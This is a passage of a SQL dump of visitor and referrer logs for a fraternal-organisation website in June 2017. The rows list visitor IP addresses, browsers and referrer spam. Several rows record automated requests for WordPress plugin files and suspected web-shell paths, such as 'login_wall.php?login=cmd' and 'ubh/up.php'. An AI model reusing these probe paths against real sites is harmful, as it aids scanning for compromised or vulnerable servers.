20','https://www.google.com/','Chrome','Windows','58.0.3029.110','','8.21.241.69','000',10,0),(6289,'2017-06-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',9,0),(6290,'2017-06-20','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(6291,'2017-06-20','http://zphiblgz.org/wp-admin/','Firefox','Windows','3.5.0','','173.208.221.194','000',7,0),(6292,'2017-06-20','http://zphiblgz.org','MSIE','Windows','9.0','','173.208.221.194','000',3,0),(6293,'2017-06-20','http://hdwallpapers-free.com/','MSIE','Unknown','6.0','','178.137.4.41','000',3,0),(6294,'2017-06-20','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(6295,'2017-06-20','https://www.google.com/','Chrome','Windows','58.0.3029.110','','96.5.120.250','000',4,0),(6296,'2017-06-20','http://omsk.zrus.org/','MSIE','Windows','5.5','','46.119.116.109','000',2,0),(6297,'2017-06-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','150.164.128.1','000',12,0),(6298,'2017-06-20','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.130.173','000',1,0),(6299,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','179.159.56.98','000',1,0),(6300,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','49.151.52.27','000',1,0),(6301,'2017-06-20','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','208.94.228.152','000',1,0),(6302,'2017-06-20','https://www.google.com/','Safari','iPhone','10.0','','104.173.8.106','000',1,0),(6303,'2017-06-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(6304,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','41.103.13.130','000',1,0),(6305,'2017-06-20','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(6306,'2017-06-20','http://yaroslavl.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',1,0),(6307,'2017-06-21','http://zphiblgz.org','Firefox','Windows','40.1','','85.206.181.115','000',1,0),(6308,'2017-06-21','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6309,'2017-06-21','http://zphiblgz.org','Firefox','Windows','40.1','','45.4.57.66','000',1,0),(6310,'2017-06-21','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.152','000',1,0),(6311,'2017-06-21','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','174.138.36.149','000',1,0),(6312,'2017-06-21','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.137','000',1,0),(6313,'2017-06-21','http://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(6314,'2017-06-21','https://www.google.com/','Chrome','Android','58.0.3029.83','','174.194.7.240','000',1,0),(6315,'2017-06-21','http://kirov.zrus.org/','Unknown','Unknown','Unknown','','46.118.125.174','000',3,0),(6316,'2017-06-21','http://zphiblgz.org','Firefox','Windows','40.1','','190.59.22.9','000',1,0),(6317,'2017-06-21','http://zphiblgz.org','MSIE','Unknown','9.0','','52.36.125.174','000',11,0),(6318,'2017-06-21','http://x-lime.net/','Unknown','Unknown','Unknown','','46.118.117.158','000',4,0),(6319,'2017-06-21','https://www.google.com/','Chrome','Windows','58.0.3029.110','','205.213.72.2','000',1,0),(6320,'2017-06-21','http://videochat.tv.br/','Opera','Windows','9.0','','46.118.124.89','000',3,0),(6321,'2017-06-21','http://zphiblgz.org','Firefox','Windows','40.1','','71.200.144.109','000',1,0),(6322,'2017-06-21','http://zphiblgz.org','Firefox','Windows','40.1','','27.5.39.78','000',1,0),(6323,'2017-06-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.197.136.2','000',1,0),(6324,'2017-06-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.4','000',1,0),(6325,'2017-06-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(6326,'2017-06-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',4,0),(6327,'2017-06-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','46.161.9.54','000',1,0),(6328,'2017-06-21','http://kostroma.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',3,0),(6329,'2017-06-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.245.60.8','000',1,0),(6330,'2017-06-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','95.128.43.164','000',1,0),(6331,'2017-06-21','http://zphiblgz.org','Firefox','Windows','40.1','','83.223.248.225','000',1,0),(6332,'2017-06-21','http://free-gluten.ru/','MSIE','Windows','6.0','','46.118.117.158','000',3,0),(6333,'2017-06-21','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',1,0),(6334,'2017-06-21','http://videochat.world/','MSIE','Windows','6.0','','46.118.125.174','000',2,0),(6335,'2017-06-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.29.8.211','000',2,0),(6336,'2017-06-21','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.203.161','000',4,0),(6337,'2017-06-21','http://zphiblgz.org','Chrome','Macintosh','35.0.1923.79','','138.128.30.159','000',2,0),(6338,'2017-06-21','http://zphiblgz.org','Firefox','Macintosh','3.6.8','','217.182.131.4','000',2,0),(6339,'2017-06-21','http://zphiblgz.org','Firefox','Windows','27.3','','54.173.240.61','000',1,0),(6340,'2017-06-21','http://yoshkarola.zrus.org/','Opera','Windows','7.0','','46.119.116.109','000',2,0),(6341,'2017-06-21','http://craftinsta.ru/','MSIE','Windows','5.0','','46.118.124.89','000',2,0),(6342,'2017-06-21','http://www.4istoshop.com/','MSIE','Windows','5.5','','46.118.117.158','000',2,0),(6343,'2017-06-22','https://vpnmouse.com/','MSIE','Windows','5.5','','46.118.124.89','000',3,0),(6344,'2017-06-22','http://typer.one/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6345,'2017-06-22','http://zphiblgz.org','Firefox','Windows','40.1','','70.26.206.37','000',1,0),(6346,'2017-06-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(6347,'2017-06-22','http://zphiblgz.org','Firefox','Windows','40.1','','5.15.82.148','000',1,0),(6348,'2017-06-22','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(6349,'2017-06-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','62.210.190.59','000',17,0),(6350,'2017-06-22','http://zphiblgz.org','Firefox','Windows','40.1','','41.158.210.108','000',2,0),(6351,'2017-06-22','https://maslenka.kz/','Opera','Windows','8.00','','46.118.125.174','000',2,0),(6352,'2017-06-22','http://perm.zrus.org/','Opera','Windows','8.00','','46.119.116.109','000',2,0),(6353,'2017-06-22','http://zphiblgz.org','Firefox','Windows','40.1','','111.100.129.66','000',1,0),(6354,'2017-06-22','http://zphiblgz.org','Firefox','Windows','40.1','','90.87.31.56','000',1,0),(6355,'2017-06-22','http://zphiblgz.org','Chrome','Linux','34.0.1847.132','','174.50.236.55','000',1,0),(6356,'2017-06-22','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.857','','178.43.106.11','000',2,0),(6357,'2017-06-22','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.21','000',2,0),(6358,'2017-06-22','https://ua.tc/','MSIE','Windows','5.5','','178.137.4.41','000',3,0),(6359,'2017-06-22','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.85','000',1,0),(6360,'2017-06-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.84','000',4,0),(6361,'2017-06-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(6362,'2017-06-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(6363,'2017-06-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.5','000',1,0),(6364,'2017-06-22','http://cheboksary.zrus.org/','MSIE','Windows','7.0a1','','46.118.125.174','000',1,0),(6365,'2017-06-22','http://kazan.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',2,0),(6366,'2017-06-22','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATOtAl_wxjAfgcL1jh-CA4FvFL09_WtXRmeIJqI-tkUFAJ_8Bm1SweNXeNfGTh4PBjRK0P9wVDAwpm6CDOQhWhXcKUSyxq08xlc','AppleWebKit','iPhone','603.2.4','','68.134.7.52','000',1,0),(6367,'2017-06-22','https://www.google.com/','Safari','iPhone','10.0','','68.134.7.52','000',2,0),(6368,'2017-06-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.73.56','000',1,0),(6369,'2017-06-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.77','000',1,0),(6370,'2017-06-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','170.250.140.52','000',2,0),(6371,'2017-06-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(6372,'2017-06-22','https://inome.com.ua/','MSIE','Windows','6.0','','46.118.117.158','000',2,0),(6373,'2017-06-22','https://bio-optomarket.ru/','Opera','Windows','9.0','','46.118.117.158','000',2,0),(6374,'2017-06-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.87.185.45','000',1,0),(6375,'2017-06-23','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.123.162','000',10,0),(6376,'2017-06-23','http://zphiblgz.org','Firefox','Windows','40.1','','175.101.67.201','000',1,0),(6377,'2017-06-23','http://cheboksary.zrus.org/','Opera','Windows','7.0','','46.119.116.109','000',2,0),(6378,'2017-06-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(6379,'2017-06-23','http://chatroulette.world/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(6380,'2017-06-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(6381,'2017-06-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',1,0),(6382,'2017-06-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',2,0),(6383,'2017-06-23','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(6384,'2017-06-23','http://irkutsk.zrus.org/','MSIE','Windows','5.0','','46.118.125.174','000',2,0),(6385,'2017-06-23','http://zphiblgz.org','Firefox','Windows','40.1','','190.152.172.174','000',1,0),(6386,'2017-06-23','http://zphiblgz.org/','Safari','iPhone','10.0','','68.134.7.52','000',1,0),(6387,'2017-06-23','http://european-torches.ru/','MSIE','Windows','6.0','','46.118.117.158','000',1,0),(6388,'2017-06-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',1,0),(6389,'2017-06-23','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(6390,'2017-06-23','http://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(6391,'2017-06-23','http://zphiblgz.org','MSIE','Windows','8.0','','150.70.173.43','000',1,0),(6392,'2017-06-23','http://zphiblgz.org','MSIE','Windows','8.0','','150.70.173.9','000',1,0),(6393,'2017-06-23','https://www.google.com/','Chrome','Windows','58.0.3029.110','','96.234.207.72','000',1,0),(6394,'2017-06-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(6395,'2017-06-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(6396,'2017-06-23','http://zphiblgz.org','MSIE','Windows','9.0','','195.154.233.112','000',2,0),(6397,'2017-06-23','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','37.229.253.71','000',1,0),(6398,'2017-06-23','http://stal-rulon.ru/','Opera','Windows','7.11','','46.118.124.89','000',3,0),(6399,'2017-06-23','http://zphiblgz.org','Firefox','Windows','40.1','','82.178.81.199','000',1,0),(6400,'2017-06-23','https://landscaping.center/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6401,'2017-06-23','http://www.wttavern.com/','MSIE','Windows','7.0a1','','46.118.117.158','000',2,0),(6402,'2017-06-23','http://zphiblgz.org','Firefox','Windows','40.1','','95.180.110.198','000',2,0),(6403,'2017-06-23','http://kostroma.zrus.org/','Opera','Windows','6.0','','46.119.116.109','000',1,0),(6404,'2017-06-23','http://zphiblgz.org','Firefox','Windows','45.0','','185.87.185.45','000',1,0),(6405,'2017-06-23','http://zphiblgz.org','Firefox','Windows','45.0','','46.101.127.145','000',1,0),(6406,'2017-06-23','http://zphiblgz.org','Firefox','Windows','45.0','','171.25.193.78','000',1,0),(6407,'2017-06-23','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','91.121.83.118','000',1,0),(6408,'2017-06-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.144.12.15','000',2,0),(6409,'2017-06-23','http://zphiblgz.org','Firefox','Windows','40.1','','187.7.195.220','000',2,0),(6410,'2017-06-23','http://chatroulette.video/','Opera','Windows','8.00','','46.118.124.89','000',1,0),(6411,'2017-06-23','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.69','000',1,0),(6412,'2017-06-23','http://zphiblgz.org','Firefox','Windows','40.1','','186.6.230.144','000',1,0),(6413,'2017-06-23','http://bryansk.zrus.org/','MSIE','Windows','5.0','','46.119.116.109','000',1,0),(6414,'2017-06-24','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(6415,'2017-06-24','http://zphiblgz.org','MSIE','Windows','6.0','','62.75.195.67','000',13,0),(6416,'2017-06-24','http://zphiblgz.org','Firefox','Windows','40.1','','85.28.78.233','000',2,0),(6417,'2017-06-24','http://zphiblgz.org','Firefox','Windows','40.1','','203.115.148.4','000',1,0),(6418,'2017-06-24','http://zphiblgz.org/wp-content/themes/evolution/content-wrapper.php','Chrome','Windows','5.0.375.99','','193.143.77.10','000',1,0),(6419,'2017-06-24','http://x-lime.net/','MSIE','Windows','6.0','','46.118.117.158','000',6,0),(6420,'2017-06-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(6421,'2017-06-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',4,0),(6422,'2017-06-24','https://dellalimov.com/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6423,'2017-06-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',1,0),(6424,'2017-06-24','https://2000k.ru/','Opera','Windows','7.54','','178.137.4.41','000',3,0),(6425,'2017-06-24','zphiblgz.org','Chrome','Windows','50.0.2661.75','','173.236.142.123','000',3,0),(6426,'2017-06-24','http://chelyabinsk.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',1,0),(6427,'2017-06-24','zphiblgz.org','Chrome','Windows','50.0.2661.75','','87.105.24.99','000',3,0),(6428,'2017-06-24','http://zphiblgz.org','Firefox','Windows','40.1','','167.250.178.252','000',1,0),(6429,'2017-06-24','http://videochat.tv.br/','Opera','Windows','9.01','','46.118.124.89','000',3,0),(6430,'2017-06-24','http://www.zphiblgz.org','Chrome','Windows','34.0.1847.131','','104.236.58.58','000',2,0),(6431,'2017-06-24','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(6432,'2017-06-24','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.107.78','000',1,0),(6433,'2017-06-25','http://zphiblgz.org','Firefox','Windows','40.1','','95.104.16.114','000',1,0),(6434,'2017-06-25','http://kemerovo.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',2,0),(6435,'2017-06-25','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.857','','146.185.223.245','000',3,0),(6436,'2017-06-25','http://yaroslavl.zrus.org/','Opera','Windows','9.0','','46.119.116.109','000',1,0),(6437,'2017-06-25','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',2,0),(6438,'2017-06-25','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','92.250.33.121','000',1,0),(6439,'2017-06-25','http://www.zetmaster.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6440,'2017-06-25','http://xn--e1afanlbnfckd7c3d.xn--p1ai/','Opera','Windows','7.0','','46.118.117.158','000',2,0),(6441,'2017-06-25','http://zphiblgz.org/framework.php','Chrome','Windows','5.0.375.99','','70.62.88.166','000',1,0),(6442,'2017-06-25','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.160','000',1,0),(6443,'2017-06-25','http://www.japan-bearings.ru/','Opera','Windows','7.11','','46.118.124.89','000',3,0),(6444,'2017-06-25','http://y8games-free.com/','Opera','Windows','8.01','','46.118.124.89','000',2,0),(6445,'2017-06-25','http://zphiblgz.org','Firefox','Windows','40.1','','80.180.147.145','000',1,0),(6446,'2017-06-25','https://www.google.com/','Safari','iPhone','602.1','','50.86.54.141','000',3,0),(6447,'2017-06-25','http://murmansk.xrus.org/','Opera','Windows','7.54','','46.118.125.174','000',3,0),(6448,'2017-06-25','http://video-chat.in/','Opera','Windows','7.11','','46.118.125.174','000',3,0),(6449,'2017-06-25','http://zphiblgz.org/wp-content/themes/sket/404.php','Chrome','Windows','5.0.375.99','','31.207.48.206','000',1,0),(6450,'2017-06-25','http://zphiblgz.org','Firefox','Windows','40.1','','105.108.239.215','000',2,0),(6451,'2017-06-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(6452,'2017-06-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(6453,'2017-06-25','http://zphiblgz.org','MSIE','Windows','6.0','','31.131.21.215','000',1,0),(6454,'2017-06-25','http://zphiblgz.org/wp-content/themes/twentyeleven/content-wrapper.php','Chrome','Windows','5.0.375.99','','193.107.88.86','000',1,0),(6455,'2017-06-25','http://zphiblgz.org/wp-content/plugins/login_wall/login_wall.php?login=cmd','MSIE','Windows','9.0','','61.158.163.93','000',1,0),(6456,'2017-06-25','http://videochat.bz/','MSIE','Windows','6.0','','46.118.124.89','000',2,0),(6457,'2017-06-25','http://zphiblgz.org','Firefox','Windows','40.1','','178.221.200.171','000',2,0),(6458,'2017-06-25','https://www.google.com/','Chrome','Android','58.0.3029.83','','66.87.80.157','000',10,0),(6459,'2017-06-25','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.95.187.246','000',1,0),(6460,'2017-06-25','http://zphiblgz.org/cron.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(6461,'2017-06-25','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/db_model.php','Chrome','Windows','5.0.375.99','','64.71.32.12','000',1,0),(6462,'2017-06-25','http://simferopol.zrus.org/','Opera','Windows','7.54','','46.119.116.109','000',1,0),(6463,'2017-06-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(6464,'2017-06-25','http://zphiblgz.org','Firefox','Windows','40.1','','103.67.196.206','000',1,0),(6465,'2017-06-25','http://zphiblgz.org','Firefox','Windows','40.1','','118.69.130.53','000',2,0),(6466,'2017-06-25','http://zphiblgz.org/wp-content/themes/sketch/edqvbo.php','Chrome','Windows','5.0.375.99','','162.144.58.198','000',1,0),(6467,'2017-06-26','http://zphiblgz.org/content-wrapper.php','Chrome','Windows','5.0.375.99','','89.31.140.30','000',1,0),(6468,'2017-06-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.36','000',14,0),(6469,'2017-06-26','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.36','000',1,0),(6470,'2017-06-26','http://gelendzhik.zrus.org/','MSIE','Windows','5.5','','46.119.116.109','000',1,0),(6471,'2017-06-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(6472,'2017-06-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.40.233','000',1,0),(6473,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','89.150.175.228','000',1,0),(6474,'2017-06-26','http://hdwallpapers-free.com/','Opera','Windows','7.54','','178.137.4.41','000',2,0),(6475,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','130.255.69.146','000',1,0),(6476,'2017-06-26','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/pdo.inc.php','Chrome','Windows','5.0.375.99','','103.6.198.212','000',1,0),(6477,'2017-06-26','http://nippon-bearings.ru/','MSIE','Windows','7.0b','','46.118.117.158','000',2,0),(6478,'2017-06-26','http://vcentre.kz/users/haikana','Chrome','Windows','28.0.1468.0','','194.135.83.53','000',1,0),(6479,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','189.82.65.112','000',1,0),(6480,'2017-06-26','http://www.pechikamini.ru/','Unknown','Unknown','Unknown','','46.118.117.158','000',2,0),(6481,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','139.194.234.175','000',1,0),(6482,'2017-06-26','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.123.162','000',4,0),(6483,'2017-06-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.239.230.70','000',2,0),(6484,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','203.194.42.96','000',2,0),(6485,'2017-06-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.134','000',2,0),(6486,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','95.247.83.41','000',1,0),(6487,'2017-06-26','https://dellalimov.com/','MSIE','Windows','6.0','','46.118.125.174','000',1,0),(6488,'2017-06-26','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(6489,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','109.98.198.6','000',2,0),(6490,'2017-06-26','http://nac-bearings.ru/','MSIE','Windows','6.0','','46.118.117.158','000',1,0),(6491,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','49.150.21.127','000',1,0),(6492,'2017-06-26','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.40.111.10','000',1,0),(6493,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','113.160.112.96','000',1,0),(6494,'2017-06-26','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.38','000',3,0),(6495,'2017-06-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',13,0),(6496,'2017-06-26','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(6497,'2017-06-26','http://zphiblgz.org','MSIE','Windows','6.0','','78.153.151.57','000',2,0),(6498,'2017-06-26','http://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',15,0),(6499,'2017-06-26','http://barnaul.zrus.org/','Opera','Windows','7.0','','46.119.116.109','000',1,0),(6500,'2017-06-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.51','000',1,0),(6501,'2017-06-26','http://zphiblgz.org/contact/','Chrome','Windows','33.0.1750.117','','155.133.38.215','000',3,0),(6502,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','175.140.153.67','000',1,0),(6503,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','103.255.5.104','000',2,0),(6504,'2017-06-26','http://samara.zrus.org/','Opera','Windows','7.11','','46.119.116.109','000',2,0),(6505,'2017-06-26','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(6506,'2017-06-26','https://buydissertation.net/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6507,'2017-06-26','http://zphiblgz.org/','Edge','Macintosh','36.01153','','91.219.237.97','000',1,0),(6508,'2017-06-26','https://www.google.com/','Safari','Macintosh','9.1.2','','73.191.122.142','000',1,0),(6509,'2017-06-26','http://www.zphibmaryland.org/chapters/','Chrome','Windows','59.0.3071.115','','71.117.30.92','000',4,0),(6510,'2017-06-26','http://zphiblgz.org','Firefox','Windows','40.1','','49.146.239.134','000',2,0),(6511,'2017-06-26','https://search.yahoo.com/','Firefox','Windows','53.0','','96.234.147.91','000',15,0),(6512,'2017-06-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.35','000',12,0),(6513,'2017-06-26','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.35','000',1,0),(6514,'2017-06-27','http://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',12,0),(6515,'2017-06-27','http://kemerovo.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',6,0),(6516,'2017-06-27','http://www.zphiblgz.org','Chrome','Windows','34.0.1847.137','','159.203.173.65','000',2,0),(6517,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','103.50.150.4','000',2,0),(6518,'2017-06-27','http://remontvsamare.su/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(6519,'2017-06-27','http://yaroslavl.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',4,0),(6520,'2017-06-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.40.111.10','000',1,0),(6521,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','109.49.11.131','000',1,0),(6522,'2017-06-27','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','10.1.1','','73.201.138.249','000',2,0),(6523,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','125.212.120.251','000',1,0),(6524,'2017-06-27','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.212.168.220','000',1,0),(6525,'2017-06-27','http://www.zphibmaryland.org/chapters/','Firefox','Windows','52.0','','132.3.21.78','000',2,0),(6526,'2017-06-27','http://zphiblgz.org/notify-SubZero?aHR0cDovL3pwaGlibGd6Lm9yZy8=;Ij4wu2kEYtLnOIBtd7Yx0opeQ3Bd87ruOW36zDZQpRk=','Firefox','Windows','52.0','','132.3.21.80','000',1,0),(6527,'2017-06-27','https://www.google.at/search?hl=en&q=Zeta Phi Beta&num=100&start=0','Chrome','Macintosh','53.0.2785.34','','173.239.222.2','000',142,0),(6528,'2017-06-27','http://chatroulette.video/','Opera','Windows','8.01','','46.118.124.89','000',3,0),(6529,'2017-06-27','http://zphiblgz.org','MSIE','Windows','6.0','','89.28.24.190','000',1,0),(6530,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','186.78.106.172','000',1,0),(6531,'2017-06-27','http://zphiblgz.org','MSIE','Windows','6.0','','185.154.22.145','000',6,0),(6532,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','188.251.89.230','000',2,0),(6533,'2017-06-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.212.73.141','000',1,0),(6534,'2017-06-27','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.169.135.133','000',1,0),(6535,'2017-06-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',11,0),(6536,'2017-06-27','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(6537,'2017-06-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',4,0),(6538,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','41.200.177.222','000',1,0),(6539,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','189.10.72.7','000',2,0),(6540,'2017-06-27','http://nippon-bearings.ru/','Unknown','Unknown','Unknown','','46.118.117.158','000',1,0),(6541,'2017-06-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.119','000',1,0),(6542,'2017-06-27','http://zphiblgz.org','Firefox','Macintosh','52.0','','46.229.170.197','000',1,0),(6543,'2017-06-27','http://zphiblgz.org','Chrome','Linux','56.0.2924.87','','46.229.170.197','000',1,0),(6544,'2017-06-27','https://coindirect.io/','MSIE','Windows','6.0','','46.118.117.158','000',2,0),(6545,'2017-06-27','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(6546,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','153.191.156.204','000',2,0),(6547,'2017-06-27','http://zphiblgz.org','Firefox','Windows','40.1','','217.55.137.236','000',1,0),(6548,'2017-06-28','http://yoshkarola.zrus.org/','Unknown','Unknown','Unknown','','46.119.116.109','000',2,0),(6549,'2017-06-28','http://free-gluten.ru/','MSIE','Windows','6.0','','46.118.117.158','000',1,0),(6550,'2017-06-28','http://mebel-vstroika.ru/','MSIE','Windows','6.0','','178.137.4.41','000',6,0),(6551,'2017-06-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(6552,'2017-06-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',2,0),(6553,'2017-06-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',2,0),(6554,'2017-06-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.98.161','000',2,0),(6555,'2017-06-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','77.108.108.14','000',4,0),(6556,'2017-06-28','74.220.219.51','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(6557,'2017-06-28','http://zphiblgz.org','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(6558,'2017-06-28','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','68.33.78.235','000',1,0),(6559,'2017-06-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','205.186.148.140','000',4,0),(6560,'2017-06-28','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','